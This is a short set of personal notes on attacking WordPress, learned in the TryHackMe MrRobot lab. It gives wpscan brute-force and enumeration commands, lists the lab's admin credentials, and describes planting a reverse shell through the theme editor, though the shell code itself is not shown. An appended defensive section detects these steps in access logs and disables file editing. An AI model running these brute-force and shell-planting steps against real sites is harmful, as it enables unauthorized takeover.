WordPress Exploitation

Learnt while doing TryHackMe: MrRobot. Will be updated as I keep learning newer things.

1) Enumeration

A) Bruteforce and login

sudo wpscan --url http://10.10.67.231/wp-login --usernames Elliot --passwords /home/kali/tryhackme/mrrobot/fsocity-sorted.dic

B) Vulnerability Scanning

wpscan --url yourwebsite.com -e vt (Vulnerable themes) (-e=enumerate)

wpscan --url yourwebsite.com -e vp (Vulnerable plugins)

wpscan --url yourwebsite.com -e <options> --api-token YOUR_TOKEN (Authenticated scan)

wpscan --url yourwebsite.com -e u (Enumerate Users)

2) Exploitation

There exist many exploitation mechanisms. First, I'll talk about editing the PHP code in the theme.

Scenario: I was able to find credentials => Elliot:ER28-0652. I logged in to the admin panel and found out that the code for the theme was editable.

I simply edit this file and add my own reverse shell code here.

Successfully gained reverse shell
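Seen from the server side, the sequence above (password guessing against the login page, a successful login, then a theme edit from the dashboard) leaves a recognisable trail in the web access log. The following is an added example, not part of the original notes: it assumes combined-format access logs, that a failed `wp-login.php` POST returns 200 and a successful one 302, and that the theme editor saves through `/wp-admin/theme-editor.php` (other save paths and XML-RPC logins are not covered). The log lines are constructed.

```python
import re
from collections import defaultdict

# Fields needed from a combined-format line: client IP, method, path, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample log (documentation IP ranges, not from a real server).
_FMT = '{ip} - - [01/Jan/2024:10:00:{s:02d} +0000] "{req} HTTP/1.1" {st} 512'
SAMPLE_LOG = "\n".join(
    [_FMT.format(ip="203.0.113.5", s=i, req="POST /wp-login.php", st=200)
     for i in range(6)]
    + [_FMT.format(ip="203.0.113.5", s=7, req="POST /wp-login.php", st=302),
       _FMT.format(ip="203.0.113.5", s=20,
                   req="POST /wp-admin/theme-editor.php", st=302),
       _FMT.format(ip="198.51.100.9", s=30, req="POST /wp-login.php", st=200),
       _FMT.format(ip="198.51.100.9", s=31, req="POST /wp-login.php", st=302),
       "garbage line"]
)

def analyse(log_text, fail_threshold=5):
    """Return {ip: [findings]} for login guessing and dashboard theme edits."""
    failures = defaultdict(int)
    findings = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # skip malformed lines instead of crashing
        ip, method, path, status = m.groups()
        path = path.split("?", 1)[0]
        if method != "POST":
            continue
        if path.endswith("/wp-login.php"):
            if status == "200":  # assumption: login form re-rendered on failure
                failures[ip] += 1
            elif status == "302" and failures[ip] >= fail_threshold:
                findings[ip].append(
                    "login succeeded after %d failures" % failures[ip])
        elif path.endswith("/wp-admin/theme-editor.php"):
            # Any dashboard theme edit is worth an alert on a production site.
            findings[ip].append("theme file edited via dashboard")
    for ip, n in failures.items():
        if n >= fail_threshold:
            findings[ip].insert(0, "brute force: %d failed logins" % n)
    return dict(findings)

if __name__ == "__main__":
    for ip, items in analyse(SAMPLE_LOG).items():
        print(ip, items)
```

Setting `define('DISALLOW_FILE_EDIT', true);` in `wp-config.php` removes the dashboard theme and plugin editors, which closes the path used in the scenario even when an admin password is guessed.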
